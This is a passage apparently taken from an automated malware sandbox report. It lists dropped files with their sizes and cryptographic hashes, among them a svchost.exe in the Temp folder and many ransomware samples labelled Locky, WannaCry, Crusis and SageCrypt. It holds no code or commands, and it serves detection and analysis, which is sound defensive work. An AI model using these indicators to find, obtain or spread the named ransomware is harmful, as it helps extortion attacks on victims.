                                                                            ef2018c0571dfbb7c2678dc4b1d4a780782ff02a

                                                                            SHA256

                                                                            da108507ea3d521a958bfd9aac0fac65af4105dde4093d448c76e3e5001b259e

                                                                            SHA512

                                                                            48b068aaabacd3b2330cbb4ce8c90918b6545c8fe80d89fde94bc62bdadc894f805fec3ad656259b79681c0d50b505483000b8366f29112e7c88e837f3923e0a

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            fe5c5aa2b968b5b0e9629afcb3751c86

                                                                            SHA1

                                                                            9d83836083e4a804ab4d5fbfb806e91b94c35164

                                                                            SHA256

                                                                            7095cb6d63b4dca0d273d954f7e560c358fb18eef807eef17aabe8c8bfd2cb18

                                                                            SHA512

                                                                            6cbdf23348c6d714081a07ca15ab095edcae40fbc72dadbb5ffd7f5fa6e1a36781f144ebae484dacae7d0a2647713c18a7b6164c5984513decbe89d963fe0fa3

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            586c5d818bb1d2c16d205d5b6f2a82a0

                                                                            SHA1

                                                                            854886d4b2252457a77ed95f61ab69485bb26283

                                                                            SHA256

                                                                            d39d06e93e125d2b56aaeb76bc066d0cb551b69e871f9e493b520741bf9cfc3a

                                                                            SHA512

                                                                            41f82e062f126414eb435bfedc65a5b9c959b4b3ca153450d4a18afbca2bdfe82179a3f74efef755e1bf9259077488684a92b07ec7488c2187e49753783e63bd

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                            Filesize

                                                                            342B

                                                                            MD5

                                                                            faba4e162b3dddbd58d10d2b6980b5d4

                                                                            SHA1

                                                                            cf448321601787926797914b13e1cbbf691f8f9b

                                                                            SHA256

                                                                            68aeeadfc52a41893eb3ad7ce11ce9292014b11c322c28295abfef032bbbb7e1

                                                                            SHA512

                                                                            5fcda5b003db5ce60751470831653fb821ed31374eab4983db6fe9dee0e5ca45de8cc08d0161b51481c833629feceb180b021a46fd50d831b5ea241489415a15

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                            Filesize

                                                                            242B

                                                                            MD5

                                                                            abec3b3a4a6fb17be65110ba3c48ee35

                                                                            SHA1

                                                                            00993a1a19cf4fb808fa2373c79e95936c256cca

                                                                            SHA256

                                                                            3860dc62eb8edca5b2b1001f750ffb3c5b3ce2d8d7aad20f142601a60724942c

                                                                            SHA512

                                                                            9f4ab46827bddc185272931d60a76bae7917e1c01e33b3cabc200455bef9a52bee66fb9bf4334ba4f6afd1c404cd8f9cfdd535d336ac966bb2c136408e876e08

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            da597791be3b6e732f0bc8b20e38ee62

                                                                            SHA1

                                                                            1125c45d285c360542027d7554a5c442288974de

                                                                            SHA256

                                                                            5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

                                                                            SHA512

                                                                            d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\08e0e2b6-be77-4b01-a603-cbbd1db66708\AgileDotNetRT64.dll
                                                                            Filesize

                                                                            143KB

                                                                            MD5

                                                                            adae83f2c2d86cb6d1798ebd4ffb2e48

                                                                            SHA1

                                                                            b6dd47415b372aa5987c3dcb7b1fbcc1fe07461f

                                                                            SHA256

                                                                            98b5180b4d5f76c69dd2da4fbd2b97c58503fd815f7809b86b0e90b15bfddb53

                                                                            SHA512

                                                                            190b25f96a2f7c8975aaef41a946b79c5969ec142919fd462ea7d5b7b91383d95304247d9ad0ad44f03dc9ae8244f95114cfe1d824982117d1d2d035d264bdda

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\Cab4338.tmp
                                                                            Filesize

                                                                            70KB

                                                                            MD5

                                                                            49aebf8cbd62d92ac215b2923fb1b9f5

                                                                            SHA1

                                                                            1723be06719828dda65ad804298d0431f6aff976

                                                                            SHA256

                                                                            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                            SHA512

                                                                            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\Tar6817.tmp
                                                                            Filesize

                                                                            181KB

                                                                            MD5

                                                                            4ea6026cf93ec6338144661bf1202cd1

                                                                            SHA1

                                                                            a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                            SHA256

                                                                            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                            SHA512

                                                                            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\nsoB349.tmp\ioSpecial.ini
                                                                            Filesize

                                                                            625B

                                                                            MD5

                                                                            d7c5baf5de1a4ee79909bfa053204382

                                                                            SHA1

                                                                            40900748d8f4ce55a839ea5efeb2a3b2675f3335

                                                                            SHA256

                                                                            9932b761b9a30b062e7a596044525ecca062b548507f9c7aebda4cb7f7900d72

                                                                            SHA512

                                                                            e872037efb96381d810ce8a528332028e8f3cbc35af08ac2a5417d46e7f4c710dede167ad704041b0213497dfbb6fefb92888e37ccbee95c846207c02b19cafa

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                            Filesize

                                                                            96KB

                                                                            MD5

                                                                            bc7c219a16023671cdbaff305fd0064b

                                                                            SHA1

                                                                            4ee1df56673ffe282a072ad783e8e4c2ba369a75

                                                                            SHA256

                                                                            9ffdf855d818abfad2865e0600b369c9e2e0e6a9900fddcc86adb2d458d2e54f

                                                                            SHA512

                                                                            891288da63f3602be4bbb43ce1f7c43b16de7dd122a90af727ba9041b3a0cbd7b6ee016d2a3da0076386d86cb93834ab18604bf07a90495627743c24a7ce1c48

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            efc00aca1cc7692d19e46a5652c8a740

                                                                            SHA1

                                                                            6d4b5bcad29390a81d189306c7a3c70c75e1ade0

                                                                            SHA256

                                                                            101075e992742c1295fda2da0e0147b817d9ced4bbc6c143352f6d9ed52c388b

                                                                            SHA512

                                                                            590789e9f5f6378e086b3e40a96807e7b60763453614f70ac0993ecb7fec6bd1492df6a797a602572676f19a7885bb04e0d415e67f91134125b011bdeb4b10dd

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Blocker.gen-23cdff4548bab414f55106bc84fc8cccf7ffba77872853d59654ed2c8dc20d7e.exe
                                                                            Filesize

                                                                            72KB

                                                                            MD5

                                                                            35d4eb9f89625dca4c15b424fa3a9b45

                                                                            SHA1

                                                                            e0788de0c601db170bdf2455ec09b5d114298bb2

                                                                            SHA256

                                                                            23cdff4548bab414f55106bc84fc8cccf7ffba77872853d59654ed2c8dc20d7e

                                                                            SHA512

                                                                            e3b186224952392d22e94523fcf17beb7ae543bad3b8095576941d82e9b3ace12f17f52cec187bde17d48610a1d27cf803ad683e5c11fa953146546223e83fd1

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-0bd80f512dd5886986209806d0dee62457bafa92b0147c34ccb39357bef7d06c.exe
                                                                            Filesize

                                                                            4.8MB

                                                                            MD5

                                                                            133643c5465121ccff6cbbcf52c522e6

                                                                            SHA1

                                                                            1053d889210c6c45dd4add75611b949aebb6e819

                                                                            SHA256

                                                                            0bd80f512dd5886986209806d0dee62457bafa92b0147c34ccb39357bef7d06c

                                                                            SHA512

                                                                            02e8afa28fe26c86a5c025cf7cc0949efe84a54c7a41598bf340ea2435bd8bd86443d21686eeb01c6655f61e96a877cb56bc08a19e3a2c5d78c0f2df7f0983a5

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-178a21b4243d7266fb7fb45e72d682c4f7cdc134e7118d96e68698c90108b6a3.exe
                                                                            Filesize

                                                                            54KB

                                                                            MD5

                                                                            e744dccf47316421565f323b5bc52f74

                                                                            SHA1

                                                                            e3c6dcc89ba90cd66c758d377ddac4ba059fc2a8

                                                                            SHA256

                                                                            178a21b4243d7266fb7fb45e72d682c4f7cdc134e7118d96e68698c90108b6a3

                                                                            SHA512

                                                                            03da1e2766c578d71a39504e237f1ad0fc430c65f3f96e074e08ff358d76e1c834cbefcdcc2f78920b4452aed2726214cff27ac302fede56d5044b605bf98dc0

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Generic-9ddd53f28685ad79e6b187b8f23d42b314598a3fbeda2c47a3533cec89ab6d0b.exe
                                                                            Filesize

                                                                            517KB

                                                                            MD5

                                                                            049f5645cedd4dfd018ae9382b0e5019

                                                                            SHA1

                                                                            aff3b1c4fcbc56545f4e5d1a9bf49a9c6806e06e

                                                                            SHA256

                                                                            9ddd53f28685ad79e6b187b8f23d42b314598a3fbeda2c47a3533cec89ab6d0b

                                                                            SHA512

                                                                            6d73d06dfc1bd36208e7f37eff93d5bf5325fedb9588ef96b856e39e6acf7771b2c1f155d7d27fbc2a04a26d0f5163e3d95b93fe4f0e4c2269dca880fefec48c

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\HEUR-Trojan-Ransom.Win32.Locky.vho-5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add.exe
                                                                            Filesize

                                                                            576KB

                                                                            MD5

                                                                            79d57f8f54bade79046ec3848bf14642

                                                                            SHA1

                                                                            7f90f82dd95f688b7479501e72f06e462876f29e

                                                                            SHA256

                                                                            5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

                                                                            SHA512

                                                                            a479858fd4a839eee155987e01f674c4e99ca0f64597a919eacfb156c24c5b4227f92d3fe13dc08e0c99cb385213bb2e6ec2c889948a14c6083f024449acdc70

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.NSIS.Locky.j-6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188.exe
                                                                            Filesize

                                                                            335KB

                                                                            MD5

                                                                            c262231fe30b3c1e14df620507e8dfac

                                                                            SHA1

                                                                            c2ba1adea569c224166b94ed6e0ed0a89e0f2733

                                                                            SHA256

                                                                            6a718cd88acf07f2cca550a4ffe5f14ddb6d6ef17d183fb1a2a1e251a1b73188

                                                                            SHA512

                                                                            2987adfbab5e06dbb4bc6d4bbc103cd23539e4429be890e4b34e033be0808c70fde0a36234d67cb3300e99effb42b8ea3af14e9b92c853838987dcf0a680e9b2

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Blocker.kcal-c8958df49eb3851df6d3c759f85c8d8a892d24baa7d0f7483431e8debd2a1fcc.exe
                                                                            Filesize

                                                                            503KB

                                                                            MD5

                                                                            3f52bf79de7fe6bd2590bc1c4c71cb84

                                                                            SHA1

                                                                            79cec929e6a18fe6891fad8002f8ee976d39453f

                                                                            SHA256

                                                                            c8958df49eb3851df6d3c759f85c8d8a892d24baa7d0f7483431e8debd2a1fcc

                                                                            SHA512

                                                                            cade14d1fb40eee69287adf4f258ed2f0e8bcdd5b1ac1758836577d634e96818ffa14024ee16a0cb56a2c0d97c758e2e8c044cd043925c369e8168c791c505ee

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Crusis.to-a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e.exe
                                                                            Filesize

                                                                            92KB

                                                                            MD5

                                                                            f2679bdabe46e10edc6352fff3c829bc

                                                                            SHA1

                                                                            60cbe0e3a70ef3d56810bd9178ce232529c09c5f

                                                                            SHA256

                                                                            a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e

                                                                            SHA512

                                                                            595e5bd98d96aa4559cb4fa23a7705d30539b70017d5bc9d83f54bdffa3446b7a7b0ec342a342ae664f044c28cf1d43d0d5674143d1489516e0765570cd2af82

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Crypren.adra-79271d57c531c79536bc0be0d71e3a372bed9c10689257a7727475ab41e3e161.exe
                                                                            Filesize

                                                                            3.1MB

                                                                            MD5

                                                                            91e55c043a89444b7cdfb335d4e4a5ba

                                                                            SHA1

                                                                            d72203d462053c1636e20cf648669b040357d5db

                                                                            SHA256

                                                                            79271d57c531c79536bc0be0d71e3a372bed9c10689257a7727475ab41e3e161

                                                                            SHA512

                                                                            3f3efbb9928a8ffa683d2c528bc442545fb330fbf981ff639a581effc91569743258cbad88e9a2c8b6e66448e56af023213fc408ab66a6b53565a4e030a37777

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Cryptor.aoo-56081040edb1e713c2abd6ef38f3f5f9e7abc4c723dc19f598b67d536a2db9a1.exe
                                                                            Filesize

                                                                            654KB

                                                                            MD5

                                                                            0719037c7f5631c5d8551232a3a874a5

                                                                            SHA1

                                                                            91df407e36acfae75e7c7659ec2cbbd25d6aa0a5

                                                                            SHA256

                                                                            56081040edb1e713c2abd6ef38f3f5f9e7abc4c723dc19f598b67d536a2db9a1

                                                                            SHA512

                                                                            9ccaae965e1b432e93165e726b7c797bb84094dbb2a77ae6cb7603c05eb3c119e4ddb208ac5be7cecf6daf8d38e22266567a0934edb2ae5639c29b5ee8b407a7

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnvv-df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916.exe
                                                                            Filesize

                                                                            2.6MB

                                                                            MD5

                                                                            ef4633ddb752fa30f97e3c8274e76de7

                                                                            SHA1

                                                                            b45c6da06bd8044a263d8687b54405db3bd39103

                                                                            SHA256

                                                                            df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916

                                                                            SHA512

                                                                            ccfe2cf6d8378652cb2740962026aef72982399f4c65e6a6af9c06a76fd6bc5072a56aa1619fa6b816654e6054ce889936874fb7c02b6dc38ccecb45bf0af339

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnwb-4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4.exe
                                                                            Filesize

                                                                            2.6MB

                                                                            MD5

                                                                            34739b7b338cd81a1a456997143170c0

                                                                            SHA1

                                                                            2a94d7facb1f42b0ada86ac1f441f9b7667a1faa

                                                                            SHA256

                                                                            4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4

                                                                            SHA512

                                                                            82547b31bf0aed59afd3e96494ab6d8f5c56613f61b77b713a1b0929b71430348dc6cdf3e57a814c634f25e5879458f7a053f6d21e2c46ca39f15cfcccbe41ee

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nokw-98d179f325c65cbf837af0e49fa6f6dfae6e9e047402c50877730b97cfebfc58.exe
                                                                            Filesize

                                                                            207KB

                                                                            MD5

                                                                            327be1197384e3ae8166ea0dacbef34d

                                                                            SHA1

                                                                            38764223b80cc1e86ad40f51903295a53260e487

                                                                            SHA256

                                                                            98d179f325c65cbf837af0e49fa6f6dfae6e9e047402c50877730b97cfebfc58

                                                                            SHA512

                                                                            8533a46f2b04cb533e40327015acf3935e8678864a86ed8f673d2c5bcbb6fa757def2eb4d5e687cf0cc47e299fed3bb0d26678b586dcd83f277391d76cce9437

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.noor-cc70e724d09f7144245bb5dabb5a04735918ad3fbdd408dab9030283e90b4a93.exe
                                                                            Filesize

                                                                            172KB

                                                                            MD5

                                                                            3d4292651aa4b6b6a30d9d169dc0f6bd

                                                                            SHA1

                                                                            2ccb25919b6093ecceae8425935262af95f6625f

                                                                            SHA256

                                                                            cc70e724d09f7144245bb5dabb5a04735918ad3fbdd408dab9030283e90b4a93

                                                                            SHA512

                                                                            c135d5e2f91bbac8f7b8fa665b366ade349811fcbf93f7918655c7c2f5c91fcee014a1d50be6503ee4a03918ec23d0fd2bfeb824b58765ea92437cec68bd5597

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aabg-539f15847c5861e602a94c04f30fc27997e1b7b1f8dc3b26be568fbc8bcbe706.exe
                                                                            Filesize

                                                                            968KB

                                                                            MD5

                                                                            4256ee4a7f187fc8756715ee8d513850

                                                                            SHA1

                                                                            24feebc1a32a5d9682b6f80e3d5400d724d7ce90

                                                                            SHA256

                                                                            539f15847c5861e602a94c04f30fc27997e1b7b1f8dc3b26be568fbc8bcbe706

                                                                            SHA512

                                                                            611fb0043c67454ced47f8cc66fafb6550ab09b391ff1c86f923f988956ab7fdb54845ca025ae388f21ae17bd1bca8438e34ebe661313dce56667c295903a795

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aave-dcf0d21c2ef66ab3d2ca1c7a0741556f7d20f8c1349b131df39df0a25bede5f9.exe
                                                                            Filesize

                                                                            575KB

                                                                            MD5

                                                                            b7a5337ae06f5259601572af5b8efa5a

                                                                            SHA1

                                                                            cea2ca64a560aff990754b06d905f40c1109f413

                                                                            SHA256

                                                                            dcf0d21c2ef66ab3d2ca1c7a0741556f7d20f8c1349b131df39df0a25bede5f9

                                                                            SHA512

                                                                            ea1ac6464bec04eb3e52ce317a92f6801a4607c66bd7b5778004aada09b3b279246dc2c25b3f0fcdbe3b69d20cce6a864d6d0c60fb7a15c6f751acc4bde17208

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aeuv-7582e36985e804e1115e91694b818e5bf17a6175a637c3e36754df861072e7e7.exe
                                                                            Filesize

                                                                            572KB

                                                                            MD5

                                                                            8b675466a4b435c474c1491101c67997

                                                                            SHA1

                                                                            913b563c9528abae3e7cfb7f8087a74b36f04eae

                                                                            SHA256

                                                                            7582e36985e804e1115e91694b818e5bf17a6175a637c3e36754df861072e7e7

                                                                            SHA512

                                                                            1fd99a12855e02af7fdeeece53f088968b9cde9949499af72e73f92d45ba4ec7f251b6890c412c4510a1dc9ac527a8ac05519fd7015f782fcd7f5fb50aaa6d87

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afet-8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285.exe
                                                                            Filesize

                                                                            617KB

                                                                            MD5

                                                                            d14bc9efe80aeb7d172cbb590f80eba7

                                                                            SHA1

                                                                            9d6ea38d9a33446488e3a53ca35669f7ded2b747

                                                                            SHA256

                                                                            8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285

                                                                            SHA512

                                                                            cb22f3c7d3f35cc4d149d88caf128229c396123997b52c2dfb70203cbb671f967c20bb1615ec84227d1207d50cacd32daf1360f076d42c50b113949074192b58

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afgz-c713b2ba0e8a6d4dfc34b628fdaff58bbd859fb9139a20786d4a4127968690ac.exe
                                                                            Filesize

                                                                            576KB

                                                                            MD5

                                                                            ec89471fcb77f4ff7cf51ed0bbafb36a

                                                                            SHA1

                                                                            d04d986ed6b067be5084b72ac6e8085e1e028686

                                                                            SHA256

                                                                            c713b2ba0e8a6d4dfc34b628fdaff58bbd859fb9139a20786d4a4127968690ac

                                                                            SHA512

                                                                            1d5cc032eff9ec5becfc98a3981ce1f6601f15fca784858d874355de406bb179ecfb2926e347273faf8a25987abb8296bd09e73797f549a9c5891f373d3eb462

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afmm-56c63fd3c9cc655e4cb815790b62f3c6830d24c47b9e03fd0927aa31aa993f60.exe
                                                                            Filesize

                                                                            594KB

                                                                            MD5

                                                                            e28624a8e538837e0d7fe9c643535344

                                                                            SHA1

                                                                            a550e873c0570f9eaa25a5a241e08403c102f715

                                                                            SHA256

                                                                            56c63fd3c9cc655e4cb815790b62f3c6830d24c47b9e03fd0927aa31aa993f60

                                                                            SHA512

                                                                            fc64cc941939f873a2b40f41197d84cb5b1be68b201d1d2687813bb24a8a60ef6a6fc82f49b86202f56bfec36ecb650f1b0546659579790df12b8080994f7057

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.cs-eee19c411a3e518cba1c930f20e566fb1af87a27c2a0290f87200da13bcdaff0.exe
                                                                            Filesize

                                                                            102KB

                                                                            MD5

                                                                            16199b0bdaaee854e052efc645a98995

                                                                            SHA1

                                                                            37740df9716e35a73d2d0e955d822ecd94ac0931

                                                                            SHA256

                                                                            eee19c411a3e518cba1c930f20e566fb1af87a27c2a0290f87200da13bcdaff0

                                                                            SHA512

                                                                            23d67bf25f780648dcc3e5930d633e681a1fb431965a54415b50f87de4b7f77c893f60414ca8193004686fdcd251e7547507beff3dc85e9c4ba1ab9aee606b2c

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.dmp-2deaa0ec7445c26f1442f860eb32f4fcda2d501699d09a94c26035d6185803ea.exe
                                                                            Filesize

                                                                            657KB

                                                                            MD5

                                                                            8009e4433aad21916a7761d374ee2be9

                                                                            SHA1

                                                                            e0538c4bb3d0310f827799c98707b681d1f91b45

                                                                            SHA256

                                                                            2deaa0ec7445c26f1442f860eb32f4fcda2d501699d09a94c26035d6185803ea

                                                                            SHA512

                                                                            404f98fb57d0842aa43d5a113a395ff1d5d963ae60bce81d4dc22f3f0b382a7ba06703b0d7404a240e5edf5f1f75f8bc9b980a966bd29b9e432cd09cb1507071

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.emd-f488204e040717d898235caea9afc64541c0cefdc1b9c25318c2b6d6fb740703.exe
                                                                            Filesize

                                                                            619KB

                                                                            MD5

                                                                            9c7d8e9d3a93425d97d4ec0d6040edc7

                                                                            SHA1

                                                                            10d1eeff1b3d4a39d4c3f8857e694c0ca26b457a

                                                                            SHA256

                                                                            f488204e040717d898235caea9afc64541c0cefdc1b9c25318c2b6d6fb740703

                                                                            SHA512

                                                                            47d32820909373c4bc720466ea9c286b760de307171165d3d298f1171d6f1aced027d018d52d2e8f05c5c032c892488f35cae1db3552e6e7ede5ffe6ddbef3b5

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zbx-9aac311c5630c3d917f9d8eb9d93a4c7c2ca09cefa1d466dd6f681699202c883.exe
                                                                            Filesize

                                                                            184KB

                                                                            MD5

                                                                            c549827edc6bf5851855933b7749967b

                                                                            SHA1

                                                                            dd94b32388da3734f72321c682d14c7a902d8bd4

                                                                            SHA256

                                                                            9aac311c5630c3d917f9d8eb9d93a4c7c2ca09cefa1d466dd6f681699202c883

                                                                            SHA512

                                                                            bcdaecffc8bfd534ca5e5e5b0e7a3485ecf56d71ec6203ea3fdcf24659f0f3b198e635d304b58d65078977ef203afa9eb2ef51a3cd78d4099a5eb67c513874c4

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zmj-d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8.exe
                                                                            Filesize

                                                                            640KB

                                                                            MD5

                                                                            b2c03024ad43a1829c7c3384866de8e6

                                                                            SHA1

                                                                            0046e4014529f2dddb581e855d1bc0e50ce56355

                                                                            SHA256

                                                                            d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8

                                                                            SHA512

                                                                            c08c7dceae01ae5b39a36d294b387e7ea27f59c1c65536a6a5d3340d944fb56e0be45ac5783c85de67b06c748cf1fbaebedb53657304d13db39758696f1298bf

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.ztv-99b0ebdeb576c983cfccf3612d6e3a41b380d0835ecc1b9e36b051d2788453ec.exe
                                                                            Filesize

                                                                            268KB

                                                                            MD5

                                                                            fee7da20404dd8f8aed5c98e33c4ac0a

                                                                            SHA1

                                                                            39015819a827e525c5b987b9b2bc1d9341a97a80

                                                                            SHA256

                                                                            99b0ebdeb576c983cfccf3612d6e3a41b380d0835ecc1b9e36b051d2788453ec

                                                                            SHA512

                                                                            6aadc51b0eeb1c9b447164f894046f5beb9bc7bf6106ed97c1e4c8813d248f652273d7a95a76ceb3eecac60694845f681ae8de041e612d753c13e72038f1e51a

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zyh-8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158.exe
                                                                            Filesize

                                                                            591KB

                                                                            MD5

                                                                            ad8a32f07b16298584f61ebe6a88b257

                                                                            SHA1

                                                                            e18cbd33779ffd3b604d5af30815e97a25ffb929

                                                                            SHA256

                                                                            8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158

                                                                            SHA512

                                                                            467a5bf11a825e599d1c11799d6060bd6de29b423aba2907f289cbd6b8dd80fa18ae4e29a4b80925ec92ee7a7dc8e32298ae0694221a25adaf0fa44ba016b180

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Purgen.nn-927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba.exe
                                                                            Filesize

                                                                            394KB

                                                                            MD5

                                                                            861e0824b4515b0a9afa19da3a0cd908

                                                                            SHA1

                                                                            d5665d4bd3132cd235d821434ec04a114e83e83e

                                                                            SHA256

                                                                            927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba

                                                                            SHA512

                                                                            d8e8b2b6b12010f66e9ce33fc2c1b510f8bad405872d0c0596b576129d206e11e988a1ab7c8877e20b180f839f1758f3f8e9fbd99411dbe13fc5abaff4ba8fe9

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.SageCrypt.cod-ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4.exe
                                                                            Filesize

                                                                            308KB

                                                                            MD5

                                                                            39fdc17df85cc6ec5e219c26577741a0

                                                                            SHA1

                                                                            15f7ce4004ba502b0a3ec2524fc697d41e642289

                                                                            SHA256

                                                                            ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4

                                                                            SHA512

                                                                            530bdb2cd8b472e2bacdd99748202fccf84af8f1391b1012b83b62b20cba9a34bf2520848a46eea5230518a13b8c705884d64411e4e6d437a428cf340dddb127

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Wanna.c-6a0ec29f934314016e28a6145b25e8f401abf7fbd77229dfaa729fad55dd31b3.exe
                                                                            Filesize

                                                                            292KB

                                                                            MD5

                                                                            b581da8662097751690bb23658487c5c

                                                                            SHA1

                                                                            e8108488881e6570f29f4a4611df285691a44522

                                                                            SHA256

                                                                            6a0ec29f934314016e28a6145b25e8f401abf7fbd77229dfaa729fad55dd31b3

                                                                            SHA512

                                                                            0ab13df42ecb79ca649f3217fb4ef345ee1724d7a1a5fba4b23bc2c0cc4d0eb4f8f8faa90be5e15f3e84d6704c15775fcdbc0ab192c35ee56c18f1985bd8da52

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Wanna.zbu-0a2bab1c970ea52bd82d1193caab0e7ef4a9d0e47f1afca32a5550481974ca72.exe
                                                                            Filesize

                                                                            3.4MB

                                                                            MD5

                                                                            18ca7cacb42a19898201539af5a88ebf

                                                                            SHA1

                                                                            37778d20a5674fb41c2ff5b42a25265d31b91dac

                                                                            SHA256

                                                                            0a2bab1c970ea52bd82d1193caab0e7ef4a9d0e47f1afca32a5550481974ca72

                                                                            SHA512

                                                                            33873bbd4fe2a30e0d3604ad8f687c39932722d6626fd6b38fcfbdaf2e97af6727c3dbfd1febb7221be2040e2f9e847e71b8eedc7e14f9de5abb0373e10f3e7c

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\UPCU.bat
                                                                            Filesize

                                                                            142B

                                                                            MD5

